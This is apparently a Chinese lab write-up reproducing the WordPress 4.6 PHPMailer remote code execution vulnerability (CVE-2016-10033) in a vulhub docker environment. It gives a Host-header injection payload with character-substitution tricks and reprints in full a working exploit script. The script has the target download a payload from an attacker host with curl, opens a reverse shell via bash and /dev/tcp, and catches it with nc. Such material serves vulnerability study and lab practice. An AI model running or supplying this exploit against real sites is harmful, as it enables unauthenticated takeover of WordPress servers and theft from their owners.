1、简介
WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。
2、影响版本
WordPress <= 4.6.0 PHPMailer < 5.2.18
3、环境搭建
我们这里使用vulhub和docker搭建环境
cd vulhub/wordpress/pwnscriptum
docker-compose build
docker-compose up -d
4、漏洞复现
访问http://your-ip:8080/打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。
漏洞缺陷处在后台找回密码的地方
注意以下几点,才能执行
1.执行的命令不能包含一些特殊的字符,例如 :,',"和管道符等。2.该命令将转换为小写字母3.命令需要使用绝对路径4.需要知道一个现有的用户名,这里是admin
解决方法
1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替Payload,在tmp处添加success文件
target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Poc
#!/bin/bash##__ __ ____ __# / / _______ _____ _/ // / / /___ ______/ /_______________#/ / / _ \/ __ `/ __ `/ // /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/# / /___/__/ /_/ / /_/ / // __/ /_/ / /__/ ,< /__/ /(__)#/_____/\___/\__, /\__,_/_//_/ /_/\__,_/\___/_/|_|\___/_//____/#/____/### WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit# CVE-2016-10033## wordpress-rce-exploit.sh (ver. 1.0)### Discovered and coded by## Dawid Golunski (@dawid_golunski)# https://legalhackers.com## ExploitBox project:# https://ExploitBox.io## Full advisory URL:# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html## Exploit src URL:# https://exploitbox.io/exploit/wordpress-rce-exploit.sh### Tested on WordPress 4.6:# https://github.com/WordPress/WordPress/archive/4.6.zip## Usage:# ./wordpress-rce-exploit.sh target-wordpress-url### Disclaimer:# For testing purposes only### -----------------------------------------------------------------## Interested in vulns/exploitation?###.;lc'#.,cdkkOOOko;.# .,lxxkkkkOOOO000Ol'# .':oxxxxxkkkkOOOO0000KK0x:'#.;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.#'';ldxxxxxdc,.,oOXXXNNNXd;,.# .ddc;,,:c;. ,c: .cxxc:;:ox:# .dxxxxo, ., ,kMMM0:.., .lxxxxx:# .dxxxxxc lW. oMMMMMMMKd0 .xxxxxx:# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:# .dxxxxxc.xN0xxxxxxxkXK,.xxxxxx:# .dxxxxxclddOMMMMWd0MMMMKddd. .xxxxxx:# .dxxxxxc.cNMMMN.oMMMMx'.xxxxxx:# .dxxxxxc lKo;dNMN.oMM0;:Ok.'xxxxxx:# .dxxxxxc;Mc .lx.:o,Kl'xxxxxx:# .dxxxxxdl;. ., .. .;cdxxxxxx:# .dxxxxxxxxxdc,.'cdkkxxxxxxxx:#.':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.#.;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.# .':oxxxxxxxxx.ckkkkkkkkxl,.# .,cdxxxxx.ckkkkkxc.#.':odx.ckxl,.#.,.'.## https://ExploitBox.io## https://twitter.com/Exploit_Box## -----------------------------------------------------------------rev_host="192.168.20.128"function prep_host_header() {cmd="$1"rce_cmd="\${run{$cmd}}";# replace / with ${substr{0}{1}{$spool_directory}}#sed 's^/^${substr{0}{1}{$spool_directory}}^g'rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"# replace ' ' (space) with#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"#return "target(any -froot@localhost -be $rce_cmd null)"host_header="target(any -froot@localhost -be $rce_cmd null)"return 0}#cat exploitbox.ansintro="DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09rbzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19fG1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19cG1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAgIHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19fIC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19fX19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtbNUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01NTU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTszNG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcbWzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2ROTU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMgICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQobWzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1szNG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtbMzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19fX19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"intro2="ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtbMG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBEaXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAgICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJpbGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="echo "$intro"| base64 -decho "$intro2" | base64 -dif [ "$#" -ne 1 ]; thenecho -e "Usage:\n$0 target-wordpress-url\n"exit 1fitarget="$1"echo -ne "\e[91m[*]\033[0m"read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choiceechoif [ "$choice" == "y" ]; thenecho -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"echo -e "\e[92m[+]\033[0m Connected to the target"# Serve payload/bash script on :80RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"echo "$RCE_exec_cmd" > rce.txtpython -mSimpleHTTPServer 80 2>/dev/null >&2 &hpid=$!# Save payload on the target in /tmp/rcecmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"prep_host_header "$cmd"curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpasswordecho -e "\n\e[92m[+]\e[0m Payload sent successfully"# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rcecmd="/bin/bash /tmp/rce"prep_host_header "$cmd"curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &echo -e "\n\e[92m[+]\033[0m Payload executed!"echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"nc -nvv -l -p 1337echoelseecho -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"exit 0fiecho "Exiting..."exit 0[点击并拖拽以移动]首先用python开启80端口
python -mSimpleHTTPServer 80
sudo ./exploit.sh http://192.168.20.128:8080
官方QQ群:
开源地址:
在线留言: